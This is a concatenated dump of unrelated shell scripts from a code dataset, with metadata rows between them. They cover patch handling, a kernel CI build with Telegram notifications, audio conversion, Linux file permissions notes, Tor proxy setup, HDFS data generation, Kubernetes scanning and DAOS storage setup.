if head -n 1 "${patch}" | "${GREP}" -q -E "^From [a-z0-9]* Mon Sep 17 00:00:00 2001" &&
"${GREP}" -q "^From: " "${patch}" &&
"${GREP}" -q "^Subject: \[PATCH" "${patch}" &&
"${GREP}" -q "^---" "${patch}"; then
PATCH_HINT="git"
return
fi
fi
}
## @description Given ${PATCH_OR_ISSUE}, determine what type of patch file is in use,
## @description and do the necessary work to place it into ${INPUT_PATCH_FILE}.
## @description If the system support diff files as well, put the diff version in
## @description ${INPUT_DIFF_FILE} so that any supported degraded modes work.
## @audience private
## @stability evolving
## @replaceable no
## @return 0 on success
## @return 1 on failure, may exit
function locate_patch
{
declare bugsys
declare patchfile=""
declare gotit=false
yetus_debug "locate patch"
if [[ -z "${PATCH_OR_ISSUE}" ]]; then
yetus_error "ERROR: No patch provided."
cleanup_and_exit 1
fi
INPUT_PATCH_FILE="${PATCH_DIR}/input.patch"
INPUT_DIFF_FILE="${PATCH_DIR}/input.diff"
echo "Processing: ${PATCH_OR_ISSUE}"
# it's a declarely provided file
if [[ -f ${PATCH_OR_ISSUE} ]]; then
patchfile="${PATCH_OR_ISSUE}"
PATCH_SYSTEM=generic
if [[ -f "${INPUT_PATCH_FILE}" ]]; then
if ! "${DIFF}" -q "${PATCH_OR_ISSUE}" "${INPUT_PATCH_FILE}" >/dev/null; then
rm "${INPUT_PATCH_FILE}"
fi
fi
else
# run through the bug systems. maybe they know?
for bugsys in "${BUGSYSTEMS[@]}"; do
if declare -f "${bugsys}_locate_patch" >/dev/null 2>&1; then
if "${bugsys}_locate_patch" \
"${PATCH_OR_ISSUE}" \
"${INPUT_PATCH_FILE}" \
"${INPUT_DIFF_FILE}"; then
gotit=true
PATCH_SYSTEM=${bugsys}
fi
fi
# did the bug system actually make us change our mind?
if [[ "${BUILDMODE}" == full ]]; then
return 0
fi
done
# ok, none of the bug systems know. let's see how smart we are
if [[ ${gotit} == false ]]; then
if ! generic_locate_patch "${PATCH_OR_ISSUE}" "${INPUT_PATCH_FILE}"; then
yetus_error "ERROR: Unsure how to process ${PATCH_OR_ISSUE}."
cleanup_and_exit 1
fi
PATCH_SYSTEM=generic
fi
fi
yetus_debug "Determined patch system to be ${PATCH_SYSTEM}"
if [[ ! -f "${INPUT_PATCH_FILE}"
&& -f "${patchfile}" ]]; then
if cp "${patchfile}" "${INPUT_PATCH_FILE}"; then
echo "Patch file ${patchfile} copied to ${PATCH_DIR}"
else
yetus_error "ERROR: Could not copy ${patchfile} to ${PATCH_DIR}"
cleanup_and_exit 1
fi
fi
}
## @description if patch-level zero, then verify we aren't
## @description just adding files
## @audience public
## @stability stable
## @param log filename
## @replaceable no
## @return $?
function patchfile_verify_zero
{
declare logfile=$1
shift
declare dir
declare changed_files1
declare changed_files2
declare filename
# don't return /dev/null
# see also similar code in change-analysis
# shellcheck disable=SC2016
changed_files1=$("${AWK}" 'function p(s){if(s!~"^/dev/null"&&s!~"^[[:blank:]]*$"){print s}}
/^diff --git / { p($3); p($4) }
/^(\+\+\+|---) / { p($2) }' "${INPUT_PATCH_FILE}" | sort -u)
# maybe we interpreted the patch wrong? check the log file
# shellcheck disable=SC2016
changed_files2=$("${GREP}" -E '^[cC]heck' "${logfile}" \
| "${AWK}" '{print $3}' \
| "${SED}" -e 's,\.\.\.$,,g')
for filename in ${changed_files1} ${changed_files2}; do
# leading prefix = bad
if [[ ${filename} =~ ^(a|b)/ ]]; then
return 1
fi
# touching an existing file is proof enough
# that pl=0 is good
if [[ -f ${filename} ]]; then
return 0
fi
dir=$(dirname "${filename}" 2>/dev/null)
if [[ -n ${dir} && -d ${dir} ]]; then
return 0
fi
done
# ¯\_(ツ)_/¯ - no way for us to know, all new files with no prefix!
yetus_error "WARNING: Patch only adds files; using patch level ${PATCH_LEVEL}"
return 0
}
## @description git apply dryrun
## @replaceable no
## @audience private
## @stability evolving
## @param path to patch file to dryrun
function gitapply_dryrun
{
declare patchfile=$1
declare prefixsize=${2:-0}
while [[ ${prefixsize} -lt 2
&& -z ${PATCH_METHOD} ]]; do
if yetus_run_and_redirect "${PATCH_DIR}/input-dryrun.log" \
"${GIT}" apply --binary -v --check "-p${prefixsize}" "${patchfile}"; then
PATCH_LEVEL=${prefixsize}
PATCH_METHOD=gitapply
break
fi
((prefixsize=prefixsize+1))
done
if [[ ${prefixsize} -eq 0 ]]; then
if ! patchfile_verify_zero "${PATCH_DIR}/input-dryrun.log"; then
PATCH_METHOD=""
PATCH_LEVEL=""
gitapply_dryrun "${patchfile}" 1
fi
fi
}
## @description patch patch dryrun
## @replaceable no
## @audience private
## @stability evolving
## @param path to patch file to dryrun
function patchcmd_dryrun
{
declare patchfile=$1
declare prefixsize=${2:-0}
while [[ ${prefixsize} -lt 2
&& -z ${PATCH_METHOD} ]]; do
# shellcheck disable=SC2153
if yetus_run_and_redirect "${PATCH_DIR}/input-dryrun.log" \
"${PATCH}" "-p${prefixsize}" -E --dry-run < "${patchfile}"; then
PATCH_LEVEL=${prefixsize}
PATCH_METHOD=patchcmd
break
fi
((prefixsize=prefixsize+1))
done
if [[ ${prefixsize} -eq 0 ]]; then
if ! patchfile_verify_zero "${PATCH_DIR}/input-dryrun.log"; then
PATCH_METHOD=""
PATCH_LEVEL=""
patchcmd_dryrun "${patchfile}" 1
fi
fi
}
## @description driver for dryrun methods
## @replaceable no
## @audience private
## @stability evolving
## @param path to patch file to dryrun
function patchfile_dryrun_driver
{
declare patchfile=$1
declare method
patch_file_hinter "${patchfile}"
#shellcheck disable=SC2153
for method in "${PATCH_METHODS[@]}"; do
if [[ -n "${PATCH_HINT}" ]] &&
[[ ! "${method}" =~ ${PATCH_HINT} ]]; then
continue
fi
if declare -f "${method}_dryrun" >/dev/null; then
"${method}_dryrun" "${patchfile}"
fi
if [[ -n ${PATCH_METHOD} ]]; then
break
fi
done
if [[ -n ${PATCH_METHOD} ]]; then
return 0
fi
return 1
}
## @description dryrun both PATCH and DIFF and determine which one to use
## @replaceable no
## @audience private
## @stability evolving
function dryrun_both_files
{
# always prefer the patch file since git format patch files support a lot more
if [[ -f "${INPUT_PATCH_FILE}" ]] && patchfile_dryrun_driver "${INPUT_PATCH_FILE}"; then
INPUT_APPLY_TYPE="patch"
INPUT_APPLIED_FILE="${INPUT_PATCH_FILE}"
return 0
elif [[ -f "${INPUT_DIFF_FILE}" ]] && patchfile_dryrun_driver "${INPUT_DIFF_FILE}"; then
INPUT_APPLY_TYPE="diff"
INPUT_APPLIED_FILE="${INPUT_DIFF_FILE}"
return 0
else
return 1
fi
}
## @description git patch apply
## @replaceable no
## @audience private
## @stability evolving
## @param path to patch file to apply
function gitapply_apply
{
declare patchfile=$1
declare extraopts
if [[ "${COMMITMODE}" = true ]]; then
extraopts="--whitespace=fix"
fi
echo "Applying the changes:"
yetus_run_and_redirect "${PATCH_DIR}/apply-patch-git-apply.log" \
"${GIT}" apply --binary ${extraopts} -v --stat --apply "-p${PATCH_LEVEL}" "${patchfile}"
${GREP} -v "^Checking" "${PATCH_DIR}/apply-patch-git-apply.log"
}
## @description patch patch apply
## @replaceable no
## @audience private
## @stability evolving
## @param path to patch file to apply
function patchcmd_apply
{
declare patchfile=$1
echo "Applying the patch:"
yetus_run_and_redirect "${PATCH_DIR}/apply-patch-patch-apply.log" \
"${PATCH}" "-p${PATCH_LEVEL}" -E < "${patchfile}"
cat "${PATCH_DIR}/apply-patch-patch-apply.log"
}
## @description driver for patch apply methods
## @replaceable no
## @audience private
## @stability evolving
## @param path to patch file to apply
function patchfile_apply_driver
{
declare patchfile=$1
declare gpg=$2
if declare -f "${PATCH_METHOD}_apply" >/dev/null; then
if ! "${PATCH_METHOD}_apply" "${patchfile}" "${gpg}"; then
return 1
fi
else
yetus_error "ERROR: Patching method ${PATCH_METHOD} does not have a way to apply patches!"
return 1
fi
return 0
}
| true |
85cb9b0e294dcb7647c3332253e39f1593284d11 | Shell | xyz-prjkt/xCircleCiScript | /.circleci/build.sh | UTF-8 | 3,595 | 3.25 | 3 | [] | no_license | #!/usr/bin/env bash
echo "Downloading few Dependecies . . ."
git clone --depth=1 $kernel_source $device_codename
git clone --depth=1 https://github.com/xyz-prjkt/xRageTC-clang clang
# Main
KERNEL_NAME=$kernel_name # IMPORTANT ! Declare your kernel name
KERNEL_ROOTDIR=$(pwd)/$device_codename # IMPORTANT ! Fill with your kernel source root directory.
DEVICE_CODENAME=$device_codename # IMPORTANT ! Declare your device codename
DEVICE_DEFCONFIG=$kernel_defconfig # IMPORTANT ! Declare your kernel source defconfig file here.
CLANG_ROOTDIR=$(pwd)/clang # IMPORTANT! Put your clang directory here.
export KBUILD_BUILD_USER=xyzuan # Change with your own name or else.
export KBUILD_BUILD_HOST=xyzscape-ci # Change with your own hostname.
IMAGE=$(pwd)/lavender/out/arch/arm64/boot/Image.gz-dtb
DATE=$(date +"%F-%S")
START=$(date +"%s")
PATH="${PATH}:${CLANG_ROOTDIR}/bin"
# Checking environtment
# Warning !! Dont Change anything there without known reason.
function check() {
echo ================================================
echo xKernelCompiler CircleCI Edition
echo version : rev1.5 - gaspoll
echo ================================================
echo BUILDER NAME = ${KBUILD_BUILD_USER}
echo BUILDER HOSTNAME = ${KBUILD_BUILD_HOST}
echo DEVICE_DEFCONFIG = ${DEVICE_DEFCONFIG}
echo CLANG_VERSION = $(${CLANG_ROOTDIR}/bin/clang --version | head -n 1 | perl -pe 's/\(http.*?\)//gs' | sed -e 's/ */ /g')
echo CLANG_ROOTDIR = ${CLANG_ROOTDIR}
echo KERNEL_ROOTDIR = ${KERNEL_ROOTDIR}
echo ================================================
}
# Compiler
function compile() {
# Your Telegram Group
curl -s -X POST "https://api.telegram.org/bot$token/sendMessage" \
-d chat_id="$chat_id" \
-d "disable_web_page_preview=true" \
-d "parse_mode=html" \
-d text="<b>xKernelCompiler</b>%0ABUILDER NAME : <code>${KBUILD_BUILD_USER}</code>%0ABUILDER HOST : <code>${KBUILD_BUILD_HOST}</code>%0ADEVICE DEFCONFIG : <code>${DEVICE_DEFCONFIG}</code>%0ACLANG VERSION : <code>$(${CLANG_ROOTDIR}/bin/clang --version | head -n 1 | perl -pe 's/\(http.*?\)//gs' | sed -e 's/ */ /g')</code>%0ACLANG ROOTDIR : <code>${CLANG_ROOTDIR}</code>%0AKERNEL ROOTDIR : <code>${KERNEL_ROOTDIR}</code>"
cd ${KERNEL_ROOTDIR}
make -j$(nproc) O=out ARCH=arm64 ${DEVICE_DEFCONFIG}
make -j$(nproc) ARCH=arm64 O=out \
CC=${CLANG_ROOTDIR}/bin/clang \
CROSS_COMPILE=${CLANG_ROOTDIR}/bin/aarch64-linux-gnu- \
CROSS_COMPILE_ARM32=${CLANG_ROOTDIR}/bin/arm-linux-gnueabi-
if ! [ -a "$IMAGE" ]; then
finerr
exit 1
fi
git clone --depth=1 $anykernel AnyKernel
cp out/arch/arm64/boot/Image.gz-dtb AnyKernel
}
# Push
function push() {
cd AnyKernel
ZIP=$(echo *.zip)
curl -F document=@$ZIP "https://api.telegram.org/bot$token/sendDocument" \
-F chat_id="$chat_id" \
-F "disable_web_page_preview=true" \
-F "parse_mode=html" \
-F caption="Compile took $(($DIFF / 60)) minute(s) and $(($DIFF % 60)) second(s). | For <b>Xiaomi Redmi Note 7 (lavender)</b> | <b>$(${CLANG_ROOTDIR}/bin/clang --version | head -n 1 | perl -pe 's/\(http.*?\)//gs' | sed -e 's/ */ /g')</b>"
}
# Fin Error
function finerr() {
curl -s -X POST "https://api.telegram.org/bot$token/sendMessage" \
-d chat_id="$chat_id" \
-d "disable_web_page_preview=true" \
-d "parse_mode=markdown" \
-d text="Build throw an error(s)"
exit 1
}
# Zipping
function zipping() {
cd AnyKernel || exit 1
zip -r9 ${KERNEL_NAME}-${DEVICE_CODENAME}-${DATE}.zip *
cd ..
}
check
compile
zipping
END=$(date +"%s")
DIFF=$(($END - $START))
push
| true |
cf48f7962b7ba096f82ace037aa28f5bf6642888 | Shell | 010penetrator/dotfiles | /sh/conv_flac2mp3.sh | UTF-8 | 396 | 3.296875 | 3 | [] | no_license | #!/bin/bash
# Convert flac tracks to mp3 VBR0
# $1 is origin path
# $2 is destination
if [ -z "$1" ] ; then set -- "." "${2}" ; fi
if [ -z "$2" ] ; then set -- "${1}" "." ; fi
cd $1
drn=${PWD##*/}
mkdir -p "$2/$drn"
for f in *.flac;
do ffmpeg -i "$f" -qscale:a 0 "$2/$drn/$f.mp3"
done
cp *[C,c]over.* "$2/$drn/"
cp [F,f]ront.* "$2/$drn/"
cp [F,f]older.* "$2/$drn/"
cp [B,b]ack.* "$2/$drn/"
| true |
063149afc28dc75885c2df2ca9ab58474cf34295 | Shell | YvgenijSharovskij/Linux | /Linux-command-line-and-shell-scripting-bible-R-Blum-and-C-Bresnahan-2015/Chapters/Chapter7-Understanding_Linux_File_Permissions | UTF-8 | 2,536 | 4.34375 | 4 | [
"MIT"
] | permissive | #!/bin/bash
###########################################################################################################
# CHAPTER 7:
# Understanding Linux File Permissions
#
#
# INDEX:
# file permissions (...)
# changing file permissions with chmod
# creating a shared group directory with SGID
#
#
###################################### file permissions (...)
#
# (...)
#
# format, e.g.:
# -rwxrwxrwx
#
# - for files
# d for directories
# l for links
# c for character dev ices
# b for block dev ices
# n for network dev ices
#
# read (r), write (w) and execute (x) permissions are set in specific order, as:
# 1) owner
# 2) group
# 3) everyone else
#
# default permissions are set as 2 with umask in the /etc/login.defs file, which uses octal format:
# Permissions Binary Octal Description
# --- 000 0 None
# --x 001 1 Execute-only
# -w- 010 2 Write-only
# -wx 011 3 Write and execute
# r-- 100 4 Read-only
# r-x 101 5 Read and execute
# rw- 110 6 Read and write
# rwx 111 7 Read, write, and execute
#
#
#
#
#
###################################### changing file permissions with chmod
#
# since default file permissions is set with umask as 2 (-w-),
# file permissions often needs to be changed in order to e.g.
# execute bash files (...); do this with chmod:
#
# syntax:
# chmod options mode file
#
# format:
# [ugoa...][+-=][rwxXstugo...]
#
# where,
#
# [ugoa...]:
# u for the user
# g for the group
# o for others (every one else)
# a for all of the above
#
# [+-=]:
# + to add to existing permissions
# - substract from existing permissions
# = set to
#
# [rwxXstugo...]:
# X assigns execute permissions only if the object is a directory or
# if it already had execute permissions
# s sets the UID or GID (user or group ID)
# t saves program text
# u sets the permissions to u (user)
# g sets the permissions to g (group)
# o sets the permissions to o (others)
#
#
# for example, to add executible permissions to the user for file_name:
# chmod u+x file_name
#
#
#
###################################### creating a shared group directory with SGID
#
# for example, set the set group id (SGID) to make a directory as shared by the group shared,
# and make any new created file in this directory as shared by the group as well:
# mkdir shared_dir
# chgrp shared shared_dir
# chmod g+s shared_dir
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
###########################################################################################################
| true |
4ca6678811775d3766345943e29e47ac35320d7e | Shell | dhonza/ne | /scripts/ale/build_merge.sh | UTF-8 | 514 | 3.171875 | 3 | [] | no_license | #!/bin/bash
FRAMES="frames001_001_2"
mkdir -p all
mkdir -p tmp
mkdir -p tmp/l0
mkdir -p tmp/l1
mkdir -p tmp/l2
unzip ${FRAMES}.zip -d tmp
unzip ${FRAMES}_l0.zip -d tmp/l0
unzip ${FRAMES}_l1.zip -d tmp/l1
unzip ${FRAMES}_l2.zip -d tmp/l2
for f in `ls tmp/*.png`
do
echo $f
g=`echo $f | sed 's/.*\\///'`
echo $g
montage tmp/$g tmp/l0/$g tmp/l1/$g tmp/l2/$g -tile 4x1 -geometry 160x210+0+0 -filter box all/$g
done
cd all
ffmpeg -y -i frame%06d.png ../${FRAMES}.m4v
cd ..
rm -rf all
rm -rf tmp | true |
dca75cb248efc90b00a628a4f1e4a60cfa25ec07 | Shell | tungpd/text_corpus | /scripts/install_proxy.sh | UTF-8 | 911 | 2.984375 | 3 | [] | no_license | #!/bin/bash
set -e
SCRIPTS_DIR="`pwd`"
ROOT_DIR="$SCRIPTS_DIR/.."
apt update
apt install -y tor
apt install -y netcat
echo "ControlPort 9051" >> /etc/tor/torrc
echo HashedControlPassword $(tor --hash-password "tor" | tail -n 1) >> /etc/tor/torrc
tail -n 2 /etc/tor/torrc
service tor restart
service tor status
echo -e 'AUTHENTICATE "tor"' | nc 127.0.0.1 9051
apt install -y curl
curl http://ipv4.icanhazip.com/
torify curl http://ipv4.icanhazip.com/
cp ./change_ip.sh /usr/local/bin/
crontab -l > /tmp/mycron
echo '0 0 * * * /usr/local/bin/change_ip.sh' >> /tmp/mycron
crontab /tmp/mycron
cd $ROOT_DIR/third_parties/polipo
make all
make install
echo "socksParentProxy = 127.0.0.1:9050" >> /etc/polipo/config
echo 'diskCacheRoot=""' >> /etc/polipo/config
echo 'disableLocalInterface=true' >> /etc/polipo/config
cp $SCRIPTS_DIR/polipo.service /etc/systemd/system/
systemctl start polipo
systemctl status polipo
| true |
e62943224691b4235f29c42fb20144fdc5ac0153 | Shell | viveksjain/repro_rdd | /ec2/gen_data.sh | UTF-8 | 1,060 | 3.28125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
if [ "$#" -ne 1 ]; then
echo "Usage: gen_data.sh <num slaves>"
exit 1
fi
source ~/scripts/common.sh
set -e
# HDFS won't let you overwrite files/directories
if $($HADOOP_INSTALL/bin/hdfs dfs -test -d /data); then
$HADOOP_INSTALL/bin/hdfs dfs -rm -r /data
fi
if $($HADOOP_INSTALL/bin/hdfs dfs -test -d /output); then
$HADOOP_INSTALL/bin/hdfs dfs -rm -r /output
fi
$HADOOP_INSTALL/bin/hdfs dfs -mkdir /data
$HADOOP_INSTALL/bin/hdfs dfs -mkdir /output
# Generate data
if [ ! -f /tmp/kmeans.txt ]; then
$SPARK_HOME/bin/spark-submit --class "KMeansDataGenerator" \
--master $SPARK_MASTER \
target/scala-2.10/data-generator_2.10-1.0.jar /tmp/kmeans.txt 10 60000000
fi
$HADOOP_INSTALL/bin/hdfs dfs -copyFromLocal -f /tmp/kmeans.txt $HDFS/data/kmeans_data
if [ ! -f /tmp/lr_data.txt ]; then
$SPARK_HOME/bin/spark-submit --class "LRDataGenerator" \
--master $SPARK_MASTER \
target/scala-2.10/data-generator_2.10-1.0.jar /tmp/lr.txt 10 60000000
fi
$HADOOP_INSTALL/bin/hdfs dfs -copyFromLocal -f /tmp/lr.txt $HDFS/data/lr_data
| true |
b8f2c3b388b305ce7b3084288387e3549f92b142 | Shell | veeraita/thesis-detecting-mtbi | /pipeline-tbi/ica/run_ica_manual.sh | UTF-8 | 475 | 3.03125 | 3 | [] | no_license | #!/bin/bash
INPUT_DIR=/scratch/work/italinv1/tbi/meg
OUTPUT_DIR=/scratch/nbe/tbi-meg/veera/processed
echo "INPUT_DIR set as $INPUT_DIR"
echo "OUTPUT_DIR set as $OUTPUT_DIR"
AR_TYPE=$1
if [ -z "$AR_TYPE" ]
then
echo "Artifact type argument [ecg,eog] is required"
exit 1
fi
FNAME=no_${AR_TYPE}_matches.txt
ml purge
module load teflon
ml anaconda3
source activate mne
python /scratch/nbe/tbi-meg/veera/pipeline/ica/run_ica_manual.py --file "${OUTPUT_DIR}"/"${FNAME}" | true |
3a70b964438abbe759b32bc3d1fcfb94d93e1963 | Shell | hsjarbin/kubernetes-devops-security | /kubesec-scan.sh | UTF-8 | 1,113 | 3.234375 | 3 | [] | no_license | #!/bin/bash
#kubesec-scan.sh
# using kubesec v2 api
scan_result=$(curl -sSX POST --data-binary @"k8s_deployment_service.yaml" https://v2.kubesec.io/scan)
scan_message=$(curl -sSX POST --data-binary @"k8s_deployment_service.yaml" https://v2.kubesec.io/scan | jq .[0].message -r )
scan_score=$(curl -sSX POST --data-binary @"k8s_deployment_service.yaml" https://v2.kubesec.io/scan | jq .[0].score )
# using kubesec docker image for scanning
# scan_result=$(docker run -i kubesec/kubesec:512c5e0 scan /dev/stdin < k8s_deployment_service.yaml)
# scan_message=$(docker run -i kubesec/kubesec:512c5e0 scan /dev/stdin < k8s_deployment_service.yaml | jq .[].message -r)
# scan_score=$(docker run -i kubesec/kubesec:512c5e0 scan /dev/stdin < k8s_deployment_service.yaml | jq .[].score)
# Kubesec scan result processing
# echo "Scan Score : $scan_score"
if [[ "${scan_score}" -ge 5 ]]; then
echo "Score is $scan_score"
echo "Kubesec Scan $scan_message"
else
echo "Score is $scan_score, which is less than or equal to 5."
echo "Scanning Kubernetes Resource has Failed"
exit 1;
fi;
| true |
15c168aca60c363ccdbf43d1780ff8e23d9c141a | Shell | poussa/daos-setup | /env.sh | UTF-8 | 3,529 | 2.71875 | 3 | [] | no_license | export DAOS_PATH=/opt/src/daos-stack/daos
export CPATH=$DAOS_PATH/install/include:$CPATH
export PATH=$DAOS_PATH/install/bin:$DAOS_PATH/install/sbin:$PATH
export CRT_PHY_ADDR_STR="ofi+sockets"
export OFI_INTERFACE=enp65s0f0
export VOS_BDEV_CLASS=nvme
export urifile=/tmp/report.uri
export LD_LIBRARY_PATH=$DAOS_PATH/install/lib:$DAOS_PATH/install/lib64:/usr/lib64
PMEM_LIST="pmem1"
DAOS_USER=daos
DAOS_GRP=daos
# For mounting dfuse wo/ orterun
export DAOS_SINGLETON_CLI=1
export CRT_ATTACH_INFO_PATH=/tmp/
ORTERUN="orterun --allow-run-as-root -np 1 --ompi-server file:${urifile}"
function _daos_prepare_pmem() {
# PMEM devs need to be in interleaved AppDirect mode (one per socket)
daos_server storage prepare --scm-only
}
function _daos_prepare_nvme() {
# Use only P4800x
daos_server storage prepare --nvme-only --pci-whitelist 5e:00.0
}
function _daos_storage_format() {
# rm -rf /mnt/daos
# umount /mnt/daos
# _daos_run_root
daos_shell -i storage format
}
function _daos_reset_nvme() {
daos_server storage prepare --nvme-only --reset
}
function _daos_scan() {
daos_server storage scan
}
function _daos_setup_user() {
sudo adduser $DAOS_USER
sudo passwd $DAOS_USER
sudo groupadd $DAOS_GRP
sudo usermod -a -G $DAOS_GRP $DAOS_USER
for dev in $PMEM_LIST; do
sudo mount /dev/$dev /mnt/daos
sudo chown $DAOS_USER.$DAOS_GRP /mnt/daos
done
}
function _daos_setup_dirs() {
DIRS="/var/run/daos_agent /var/run/daos_server"
for dir in $DIRS; do
sudo mkdir $dir
sudo chown $DAOS_USER $dir
sudo chmod 0774 $dir
done
}
function _daos_run() {
orterun \
-np 1 \
--hostfile hostfile \
--enable-recovery \
--report-uri report.uri \
daos_server \
-t 1 \
-i \
-o /home/spoussa/src/daos-config/daos_server_wolfpass4.yaml
}
function _daos_run_root() {
orterun \
--allow-run-as-root \
-n 1 \
--hostfile hostfile \
--enable-recovery \
--report-uri /tmp/report.uri \
daos_server \
--insecure \
-t 1 \
--config=/home/spoussa/src/daos-config/daos_server_wolfpass4.yaml \
start \
-a /tmp
}
function _daos_agent_run() {
daos_agent \
--insecure \
-o /home/spoussa/src/daos-config/daos_agent_wolfpass4.yaml
}
function _daos_pool_create() {
$ORTERUN dmg create --size=10G
}
function _daos_pool_destroy() {
$ORTERUN dmg destroy --pool $1
}
function _daos_pool_query() {
$ORTERUN dmg query --svc 0 --pool $1
}
function _daos_container_list() {
#$ORTERUN daos pool list-containers --pool $1 --svc 0 # not implemented yet
daos container query --svc=0 --path=/tmp/container-1
}
function _daos_container_create() {
# 3838f949-bd7f-491c-939a-b8a61a0bd373
$ORTERUN daos container create --pool=$1 --type=POSIX --svc=0
}
function _daos_container_create_with_path() {
# 3838f949-bd7f-491c-939a-b8a61a0bd373
$ORTERUN daos container create --pool=$1 --type=POSIX --svc=0 --path=/tmp/container-1 --oclass=S1 --chunk_size=4K
}
function _daos_mount_hl() {
# p: 3838f949-bd7f-491c-939a-b8a61a0bd373
# c: bfd123ba-7b83-4b3b-aa41-8601d4d9cb58
$ORTERUN dfuse_hl /tmp/daos -o default_permissions -s -f -p $1 -c $2 -l 0 &
mount -t fuse
}
function _daos_mount() {
dfuse -p $1 -c $2 -s 0 -m /tmp/daos -S
}
function _daos_umount() {
fusermount -u /tmp/daos
}
function _daos_test() {
$ORTERUN daos_test
}
| true |
3f348ab741a39e0fff9f3e17852403c79a16ef55 | Shell | geekman/dracut-gmcrypt | /90zgmcrypt/add-key.sh | UTF-8 | 1,251 | 4.34375 | 4 | [] | no_license | #!/bin/bash
#
# generates the system key and adds it into the specified LUKS volume
# this needs to be run on the SAME system that is used to generate the key!
#
# usage: add-key.sh <dev>
#
DEV=$1
if [ -z "$DEV" -o ! -b "$DEV" ]; then
echo "usage: `basename $0` <luks-dev>"
exit 1
fi
# include the lib
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
source $SCRIPT_DIR/gmcrypt-lib.sh
if ! cryptsetup isLuks "$DEV" 2>/dev/null; then
echo "$DEV is not a LUKS device"
exit 1
fi
DEV_UUID=luks-$(cryptsetup luksUUID "$DEV")
if [ ${#DEV_UUID} -lt 10 ]; then
echo "cryptsetup returned UUID is too short: $DEV_UUID"
exit 1
fi
TMPFILE=$(mktemp -q /tmp/keyfile.rootfs.XXXXXXXXXX) || exit 1
trap "rm -f $TMPFILE" EXIT
#
# show user key slots and ask if we should remove slot 1
#
echo
cryptsetup luksDump $DEV | grep -i "slot\|header"
read -p "Should I remove key from slot 1? " removeKey
case $removeKey in
[Yy])
echo "Wiping key slot #1..."
cryptsetup luksKillSlot $DEV 1
;;
esac
#
# generate and add key
#
echo
echo "Generating key and adding it to ${DEV}..."
gmcrypt_genkey "$TMPFILE" "$DEV_UUID" &&
cryptsetup luksAddKey --iter-time 3000 "$DEV" "$TMPFILE"
echo "Done."
| true |
c0822c006c2299d6ae5a6acf385cc3a97b2d725e | Shell | srsman/bios-downloader | /modules/vendor-samsung.sh | UTF-8 | 3,778 | 3.90625 | 4 | [] | no_license | #!/bin/sh
# Please source common.sh before this file.
BIOS_DOWNLOAD_METHOD_SAMSUNG="$(echo $VENDOR|grep -i "^Samsung" >/dev/null && echo "get_bios_samsung" || true)"
BIOS_DOWNLOAD_METHODREQS_SAMSUNG="current-bios-version|samsung-platform-id"
if [ -z "$BIOS_DOWNLOAD_METHOD_SAMSUNG" ]; then
unset BIOS_DOWNLOAD_METHOD_SAMSUNG
fi
SAMSUNG_STATS="$WDIR/Samsung-PlatformID-stats.txt"
request_file_by_platform_id(){
local PlatformID="$1"
local URL="http://sbuservice.samsungmobile.com/BUWebServiceProc.asmx/GetContents?platformID=$PlatformID&PartNumber=AAAA"
msg "Samsung PlatformID: $PlatformID"
info "Requesting $URL"
local RESPONSE="$(curl -f $URL)"
local FILE=$(echo "$RESPONSE"|tr -d '\r'|sed -n "s/<FilePathName>\(.*\)<\/FilePathName>/\1/p"|tr -d '[[:blank:]]') #"
if [ -z "$FILE" ]; then
info "No file given in response."
return 2
else
echo "$FILE"
fi
}
append_platformid_list(){
local PlatformID="$1"
if echo "$PlatformID_LIST"|grep "^$PlatformID$" >/dev/null; then
debug "Skipping PlatformID: $PlatformID"
else
debug "Adding PlatformID: $PlatformID"
PlatformID_LIST="$(printf "%s\n%s\n" "$PlatformID_LIST" "$PlatformID"|uniq)"
fi
}
get_platformid_by_bios_version(){
local PlatformID_LIST=
# Platform ID is samsung specific magic. Seems like the only chance to get it is BIOS VERSION
# We take only first word if there are any dots in BIOS version.
BIOSVER=${current_bios_version%%.*}
debug "Effective BIOS Version: $BIOSVER"
BIOSVER_CHARS="$(echo "$BIOSVER"|awk '{print length($1)}')"
debug "BIOS Version length: $BIOSVER_CHARS"
if [ -f "$SAMSUNG_STATS" ]; then
debug "We have Samsung PlatformID stats file. Using it."
while read count pchars bchars calc biosv platid; do
info "Trying PlatformID calc scheme $pchars-$bchars-$calc"
case $calc in
normal)
PlatformID=$(echo "$BIOSVER"|sed "s/./&\n/g"|grep -v '^$'|tail -n $pchars|tr -d '\n')
;;
zerohack)
PlatformID="0$(echo "$BIOSVER"|sed "s/./&\n/g"|grep -v '^$'|tail -n $((pchars-1))|tr -d '\n')"
;;
*)
PlatformID="$platid"
;;
esac
#Adding stats-based IDs
append_platformid_list "$PlatformID"
done << STATS
$(awk -v b=$BIOSVER_CHARS '{if(($3==b)&&($1>6))print}' "$SAMSUNG_STATS")
STATS
#'
else
warning "Samsung PlatformID stats file is unaccessible. Please run samsung-platformid-stats to generate $SAMSUNG_STATS."
fi
# Adding simple method ID
PlatformID=${BIOSVER:$((BIOSVER_CHARS/2))}
append_platformid_list "$PlatformID"
echo "$(echo $PlatformID_LIST)"
}
get_bios_samsung(){
if [ -z "$samsung_platform_id" ]; then
if [ -z "$current_bios_version" ]; then
current_bios_version=$(cat /sys/class/dmi/id/bios_version || sudo dmidecode -s bios-version)
fi
msg "Current BIOS Version: $current_bios_version"
samsung_platform_id="$(get_platformid_by_bios_version $current_bios_version)"
fi
for PlatformID in $samsung_platform_id; do
FILE=$(request_file_by_platform_id "$PlatformID"||true)
if [ -n "$FILE" ]; then
break
fi
done
if [ -z "$FILE" ]; then
doexit 5 "BIOS update package is not found. Sorry."
fi
msg "File to download: $FILE"
FILE_URL="http://sbuservice.samsungmobile.com/upload/BIOSUpdateItem/$FILE"
msg "URL: $FILE_URL"
[ -d "$DOWNLOAD_DIR" ] || mkdir -p "$DOWNLOAD_DIR" || (echo "Could not create $DOWNLOAD_DIR"; exit 1 )
if [ -f "$DOWNLOAD_DIR/$FILE" ] && [ -z "$force" ]; then
warning "Already there: $DOWNLOAD_DIR/$FILE . Will not download unless --force is specified."
else
msg "Downloading $FILE"
curl --progress-bar -o "$DOWNLOAD_DIR/$FILE" "$FILE_URL" || (echo Download failed; exit 2)
if [ $? -eq 0 ]; then
break
fi
msg "Download OK"
fi
}
| true |
c43154e0e0be99b774429175f893501c0971afde | Shell | inri13666/azure-php-docker | /.build/init_container.sh | UTF-8 | 3,184 | 3.390625 | 3 | [] | no_license | #!/bin/bash
